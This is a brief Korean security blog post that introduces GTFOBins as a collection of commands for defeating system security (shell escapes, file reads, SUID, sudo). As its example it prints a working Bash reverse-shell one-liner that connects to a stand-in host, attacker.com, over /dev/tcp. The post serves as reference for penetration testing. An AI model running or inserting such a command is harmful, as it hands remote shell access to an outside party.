🔒정보보안
보안 - GTFOBins, 시스템 보안 무력화 명령어 모음들
Janger
2023. 1. 22. 17:13
728x90
GTFOBins
pg Shell File read SUID Sudo
gtfobins.github.io
예시) Bash 리버스 쉘 활성화 명령어
export RHOST=attacker.com
export RPORT=12345
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
리버스 쉘, 바인드 쉘, SUID 등
728x90